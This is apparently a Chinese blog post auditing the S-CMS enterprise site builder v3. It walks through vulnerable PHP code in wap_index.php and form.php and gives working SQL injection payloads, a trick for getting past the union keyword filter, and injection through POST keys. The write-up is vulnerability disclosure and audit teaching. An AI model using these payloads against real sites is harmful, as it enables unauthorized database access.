S-CMS企业建站v3几处SQL注入
0x01 前言
有段时间没有发文章了,主要没挖到比较有意思的漏洞点。然后看最近爆了很多关于S-CMS的漏洞,下载了源码简单挖了一下然后给大家分享一下。
0x02 目录
Wap_index.php sql注入
Form.php Sql注入
Input、query
0x03 插曲
这里分享一下在审计的时候自用的一段代码。
- $debug=function(){
- $logFile='C:\\Users\\DELL\\Desktop\\debug.txt'; //输出的文件
- $param=func_get_args(); //获取传入函数的参数
- if (count($param)>0){
- $str=serialize($param); //序列号
- if($str){ //存在就写入
- $str=file_get_contents($logFile)."\r\n\r\n".__FILE__.":\t\t".$str;
- file_put_contents($logFile,"\t\t".$str);
- }else{ //不存在写入Null
- $str=file_get_contents($logFile)."\r\n\r\n".__FILE__.":\r\n".$str;
- file_put_contents($logFile,"\t\tNull");
- }
- }
- };$debug($x,$a,$b); //这里$x,$a,$b都是要查看的变量。
主要用这个的话个人感觉比较方便,平常测试都是var_dump();die;来查看。然后当die后,页面还是没有打印内容,用这个函数还是相对比较方便的。当然用phpstorm下断点挺好的,不过个人不太喜欢。主要还是我懒。
0x04 Wap_index.php sql注入
漏洞文件:\scms\wap_index.php
这个文件的话不止这一处Sql注入,这里只写这一个。
漏洞行号:90-96
- case "text":
- $debug("select * from SL_text where T_id=" . $S_id, "T_title");
- if (getrs("select * from SL_text where T_id=" . $S_id, "T_title") == "") {
- box("菜单指向的简介已被删除,请到“菜单管理”重新编辑", "back", "error");
- } else {
- $page_info = ReplaceLableFlag(ReplaceWapTag(CreateHTMLReplace(CreateText(ReplaceWapPart(LoadWapTemplate($style, $S_id)) , $S_id))));
- }
- break;
S_id直接从GET获取无单引号拼接进了sql语句
- if(isset($_GET["S_id"])){
- $S_id = $_GET["S_id"];
- }else{
- $S_id = "0";
- }
这套CMS核心全带全都加密处理了所以我们看不到他的过滤方法,不过当出现 union select 等的时候都直接退出了,没有继续往下执行。研究发现当传入select(user())能正常执行,不过尝试union(select(1)) 的时候也没有执行,应该是直接正则匹配的union这个单词,而select匹配了前后的空格。
漏洞演示:
$debug保存下来的信息。
D:\phpStudy\PHPTutorial\WWW\scms\wap_index.php: a:2:{i:0;s:58:"select * from SL_text where T_id=1 and (select(user())!=1)";i:1;s:7:"T_title";}
Mysql.log
正常执行了sql语句。
S_id=1 and (select(user()) from sl_reply 同样可以正常执行,可通过盲注爆数据。
0x05 Form.php Sql注入
漏洞文件:\scms\form.php
漏洞Action:input
- if($action=="input"){
- if ($_POST["code"]!=$_SESSION["CmsCode"]){
- echo "<div style='height:500px'></div>";
- box(lang("验证码错误!/l/Verification code error"),"back","error");
- }else{
- $R_time=date('Y-m-d H:i:s');
- $R_rid=gen_key(15);
- foreach ($_POST as $x=>$value) {
- if ($x>0){
- if ($_POST[$x]==""){
- box(lang("请填全内容后提交!/l/Please fill in the full content to submit!"),"back","error");
- die();
- }else{
- if (!IsValidStr($_POST[$x])){
- box(lang("您输入的内容有敏感字符,请重新输入!/l/The contents you have entered are sensitive characters, please re-enter!"),"back","error");
- }else{
- $debug("Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(".$x.",'".htmlspecialchars($_POST[$x])."','".$R_time."','".$R_rid."',".$M_id.")");
- mysqli_query($conn,"Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(".$x.",'".htmlspecialchars($_POST[$x])."','".$R_time."','".$R_rid."',".$M_id.")");
- }
- }
- }
- }
- if ($F_cq>0){
- mysqli_query($conn,"Insert into SL_query(Q_code,Q_content,Q_sort) values('".$R_rid."','".date('Y-m-d H:i:s')."__用户提交表单,等待处理"."',".$F_cq.")");
- box(lang("提交成功,查询码 ".$R_rid."/l/success!code ".$R_rid.""),$C_dir.$url_to,"success");
- }else{
- box(lang("提交成功!/l/success!code ".$R_rid.""),$C_dir.$url_to,"success");
- }
- sendmail("您的网站有新的表单提交","<h2>您的网站“".lang($C_webtitle)."”有新的表单提交</h2><hr>请进入“网站后台” - “表单系统” - “查看统计”查看详情!",$C_email);
- }
- }
这里简单看些逻辑,先判断code验证码是否错误,如果为False不错误,进入foreach循环,判断$x(也就是 $_POST的key)>0这里就可以通过php弱类型比如1a>0 为True 这个不多介绍了,然后如果$_POST[$x] 不为空,继续检测$_POST[$x] 是否存在敏感字符,然后拼接sql语句。
整个流程就这样了,漏洞触发点就是$x,它检测敏感字符只检测了$_POST[$x]内容,而没检测$x,而且直接拼接入了sql语句导致SQL注入。
漏洞演示:
http://127.0.0.1/scms/form.php?action=input&S_id=0
code=ywu7&1//and//(1//like//1)=121
$debug记录
D:\phpStudy\PHPTutorial\WWW\scms\form.php: a:1:{i:0;s:147:"Insert into SL_response(R_cid,R_content,R_time,R_rid,R_member) values(1//and//(1//like//1),'121','2018-12-05 15:27:00','WjWEpX8YIK6cfeq',6)";}
漏洞文件:\scms\form.php
漏洞Action:query
- if ($action=="query"){
- $Q_sort=$_POST["Q_sort"];
- $Q_code=$_POST["Q_code"];
- if ($_POST["code"]!=$_SESSION["CmsCode"]){
- echo "<div style='height:500px'></div>";
- box(lang("验证码错误!/l/Verification code error"),"back","error");
- }else{
- $sql="select * from SL_query where Q_sort=".$Q_sort." and Q_code like '".$Q_code."'";
- $result = mysqli_query($conn, $sql);
- $row = mysqli_fetch_assoc($result);
这个相对简单不多说,$Q_sort从post获取,无过滤直接拼接进sql语句导致sql注入。
Payload:
http://127.0.0.1/scms/form.php?action=query&S_id=0
code=t5o9&Q_sort=1 and 1=1
S-CMS企业建站v3几处SQL注入的更多相关文章
- [代码审计]云优cms V 1.1.2前台多处sql注入,任意文件删除修复绕过至getshell
0X00 总体简介 云优CMS于2017年9月上线全新版本,二级域名分站,内容分站独立,七牛云存储,自定义字段,自定义表单,自定义栏目权限,自定义管理权限等众多功能深受用户青睐,上线短短3个月,下载次 ...
- S-CMS企建v3二次SQL注入
S-CMS企建v3二次SQL注入 0x01 前言 继上一篇的S-CMS漏洞再来一波!首发T00ls 0x2 目录 Sql注入二次SQL注入 0x03 Sql注入 漏洞文件:\scms\bbs\bbs. ...
- ThinkCMF X2.2.2多处SQL注入漏洞分析
1. 漏洞描述 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本.最近刚好在渗透测试 ...
- Vtiger CRM 几处SQL注入漏洞分析,测试工程师可借鉴
本文由云+社区发表 0x00 前言 干白盒审计有小半年了,大部分是业务上的代码,逻辑的复杂度和功能模块结构都比较简单,干久了收获也就一般,有机会接触一个成熟的产品(vtiger CRM)进行白盒审计, ...
- sqli-labs(八)——修改密码处sql注入+http头sql注入
第17关: 这是一个重置密码的功能存在sqk注入,尝试账号密码都输入'",发现只会显示登陆失败,没有报错信息. 这个时候先推测一下后台的sql形式大概应该是: update users se ...
- Joomla CMS 3.2-3.4.4 SQL注入 漏洞分析
RickGray · 2015/10/26 11:24 昨日,Joomla CMS发布新版本3.4.5,该版本修复了一个高危的SQL注入漏洞,3.2至3.4.4版本都受到影响.攻击者通过该漏洞可以直接 ...
- sqli-labs(七)——登陆处sql注入
第十三关: 这关也是一个登陆口,和上关所说的一样,先使用'"试一下,让程序报错然后判断后台的sql语句 可以看到后台sql大概是 where name = ('$name')... 这样的 ...
- 74cms v3.3 后台SQL注入
注入存在于后台 admin_baiduxml.php 代码 52-63行 elseif($act == 'setsave') { $_POST['xmlmax']=intval($_POST['xml ...
- DM企业建站系统v201710 sql注入漏洞分析 | 新版v201712依旧存在sql注入
0x00 前言 本来呢,这套CMS都不想审的了.下载下来打开一看,各种debug注释,排版烂的不行. 贴几个页面看看 感觉像是新手练手的,没有审下去的欲望了. 但想了想,我tm就是新手啊,然后就继续看 ...
随机推荐
- HashMap 和 Hashtable 的 6 个区别
HashMap 是非常重要且常用的一种集合,还有一个和它类似的集合即Hashtable,有必要知道它们之间的区别. 1.线程安全: Hashtable 是线程安全的,HashMap 则不是线程安全的. ...
- CSV文件导入导mysql数据库
1.导入 基本语法: load data [low_priority] [local] infile 'file_name txt' [replace | ignore] into table tbl ...
- pytest(1)
安装就讲这么多,别的不多比比 第1个例子(基本法要了解): 这个例子中,还有一些需要注意的知识点: 1 pytest将在当前目录及其子目录中运行test _ * .py或* _test.py形式的所有 ...
- ASP.NET Core微服务 on K8S学习笔记(第一章:详解基本对象及服务发现)
课程链接:http://video.jessetalk.cn/course/explore 良心课程,大家一起来学习哈! 任务1:课程介绍 任务2:Labels and Selectors 所有资源对 ...
- mac抓包工具anyproxy
本文以 mac为代理,ios手机为客户端举例. 文档地址:http://anyproxy.io/ 1.环境配置: 安装 node :参考 https://www.jianshu.com/p/3 ...
- 2018—2019-- 2网络对抗技术20165239Exp信息搜集 漏洞扫描
一.实验内容 二.实验步骤 1.各种搜索技巧的应用 2.DNS IP注册信息的查询 3.基本的扫描技术 主机发现 端口扫描 OS及服务版本探测 具体服务的查点 4.漏洞扫描 三.实验中遇到的问题 四. ...
- Codeforces 126B. Password (KMP)
<题目链接> 题目大意:给定一个字符串,从中找出一个前.中.后缀最长公共子串("中"代表着既不是前缀,也不是后缀的部分). 解题分析:本题依然是利用了KMP中next数 ...
- 13-事务&数据库连接池&DBUtiles
事务&数据库连接池&DBUtils 事务 Transaction 其实指的一组操作,里面包含许多个单一的逻辑.只要有一个逻辑没有执行成功,那么都算失败. 所有的数据都回归到最初的状态 ...
- 微信JS SDK接入的几点注意事项
微信JS SDK接入,主要可以先参考官网说明文档,总结起来有几个步骤: 1.绑定域名:先登录微信公众平台进入“公众号设置”的“功能设置”里填写“JS接口安全域名”.备注:登录后可在“开发者中心”查看对 ...
- 新建一个express项目的流程
1.先创建一个文件夹,然后创建一个项目,默认有一个:package.json 文件 #初始化项目 npm init 2.初始化项目会出现一个默认的提醒 #这个实用程序将指导您创建一个包,json文件. ...